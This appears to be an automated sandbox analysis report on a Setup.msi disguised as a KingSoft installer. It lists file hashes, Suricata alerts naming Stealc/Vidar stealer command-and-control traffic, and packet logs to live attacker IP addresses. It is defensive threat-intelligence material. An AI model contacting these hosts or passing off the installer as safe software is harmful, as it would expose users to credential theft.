                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                  Chrome Cache Entry: 133

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):132739
                                                                                                                                                                                                                                                  Entropy (8bit):5.436740311922012
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:fVkJQ7O4N5dTm+syHEt4W3XdQ4Q6QuSr/nUW2i6o:fkQ7HTt/sHdQ4Q6QDfUW8o
                                                                                                                                                                                                                                                  MD5:43F099A582AE0F93DFE1B05E01908210
                                                                                                                                                                                                                                                  SHA1:3F2716DA2BF4225D574995FD23B07605152A70C6
                                                                                                                                                                                                                                                  SHA-256:16BB032508AA4537E3B7804C930ACFFA312A81C85C23378B4D979CBAC2E2CEBE
                                                                                                                                                                                                                                                  SHA-512:705A5F2EF20790675814218CA75CD5F9618B6F7189D83FA5D0D31119F20EA72274724EAF79BCB6813D35CDF5A87715BCFC1786E4689A24EB1EA28A2371F8DD59
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {2FA3CD4B-28FE-4C2B-80E4-DCE280079806}, Number of Words: 2, Subject: KingSoft, Author: SoftPortable, Name of Creating Application: KingSoft, Template: ;1033, Comments: This installer database contains the logic and data required to install KingSoft., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Dec 16 18:53:38 2024, Last Saved Time/Date: Mon Dec 16 18:53:38 2024, Last Printed: Mon Dec 16 18:53:38 2024, Number of Pages: 450
                                                                                                                                                                                                                                                  Entropy (8bit):6.635963694120387
                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                                                                                                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                                                                                                                                  File name:Setup.msi
                                                                                                                                                                                                                                                  File size:2'098'688 bytes
                                                                                                                                                                                                                                                  MD5:c1d7c466cf70f32ce2fd51609ea97fab
                                                                                                                                                                                                                                                  SHA1:d7fa0337f01755188d74e1ca17d9da89d36572da
                                                                                                                                                                                                                                                  SHA256:d10e2be559191ccef09f8b31c946fe09840f4c60374d44f6672663c53ba1431a
                                                                                                                                                                                                                                                  SHA512:36eb43516222c9264f7f6f5d6a3a40fbc879a277c42fb8281dcf7d810192a5087a441b6b107bf9f2410ff9f19dbb68ebc4ca06125fea67adfedba1fccb7367ed
                                                                                                                                                                                                                                                  SSDEEP:49152:ESmM8cU7Y4zG/knHeVdOEod5+1d7csiG/C:p4eYHeVdPod57
                                                                                                                                                                                                                                                  TLSH:25A5AE11B3CAC236E16E01BBE829EE0AE139BD63033081D763E6755E1E718C1577EB52
                                                                                                                                                                                                                                                  File Content Preview:........................>...................!...................................E.......a.......n.......................................C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R..........................................................

                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                  Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2024-12-17T17:28:33.734481+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449738138.124.60.13380TCP
                                                                                                                                                                                                                                                  2024-12-17T17:29:14.293340+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.449785116.203.12.114443TCP
                                                                                                                                                                                                                                                  2024-12-17T17:29:14.293539+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.12.114443192.168.2.449785TCP
                                                                                                                                                                                                                                                  2024-12-17T17:29:16.597803+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.12.114443192.168.2.449791TCP

                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:02.789805889 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:32.335766077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:32.455301046 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:32.455486059 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:32.455785036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:32.575237036 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734358072 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734405041 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734415054 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734481096 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734508038 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734565020 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734599113 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734610081 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734620094 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734628916 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734639883 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734642029 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734674931 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734694958 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734954119 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734963894 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.734997988 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.854159117 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.854309082 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.854337931 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.854393959 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.858288050 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.858393908 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.926630020 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.926717043 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.926772118 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.926789045 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930809975 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930870056 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930912018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.930953026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939310074 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939393997 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939419031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.939454079 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947659016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947702885 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947741032 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.947762012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.955951929 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.955995083 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.956151962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.956151962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964394093 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964473009 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964488983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.964541912 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972825050 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972876072 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972942114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.972994089 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981178999 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981237888 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981267929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.981317997 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.989542961 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.989643097 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.989759922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.997910976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.997977018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.998018980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:33.998045921 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.005445004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.005604029 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.058501005 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.058542013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.058670044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.062230110 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.062313080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124823093 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124907017 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124948025 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.124982119 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127068043 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127171040 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127933025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.127990961 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.128022909 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.128068924 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132795095 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132868052 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132893085 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.132939100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.137885094 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.137994051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.138117075 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.138211012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.142499924 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.142514944 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.142615080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147037983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147097111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147146940 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.147181034 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153114080 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153207064 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153343916 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.153395891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156668901 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156739950 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156896114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.156949043 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.161413908 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.161444902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.161559105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166193962 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166243076 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166273117 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.166311026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170742035 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170814037 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170819044 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.170850992 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175473928 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175550938 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175586939 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.175633907 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.180248976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.180316925 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.180362940 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.180407047 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.184958935 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.185023069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.185211897 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.185256004 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.189836025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.189889908 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.189918995 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.189959049 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.194551945 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.194607019 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.194613934 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.194657087 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.199070930 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.199165106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.199172974 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.199227095 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.203938961 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.204001904 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.255628109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.255708933 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.255729914 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.255767107 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.257823944 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.257882118 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.257972002 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.258018017 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.262343884 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.262434959 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.316463947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.316497087 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.316596031 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.316627026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.317209959 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.317253113 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.317261934 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.317297935 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.320120096 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.320208073 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.320257902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.320300102 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.322211981 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.322266102 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.322299957 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.322336912 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.325020075 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.325087070 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.325109005 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.325145006 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.327919960 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.327980995 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.328150034 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.328193903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.330580950 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.330645084 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.330677986 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.330717087 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.333256960 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.333319902 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.333430052 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.333476067 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.336025000 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.336080074 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.336117029 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.336148977 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.338958979 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.339025021 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.339034081 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.339082956 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.341545105 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.341607094 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.341783047 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.341825962 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.344240904 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.344299078 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.344307899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.344343901 CET4973880192.168.2.4138.124.60.133
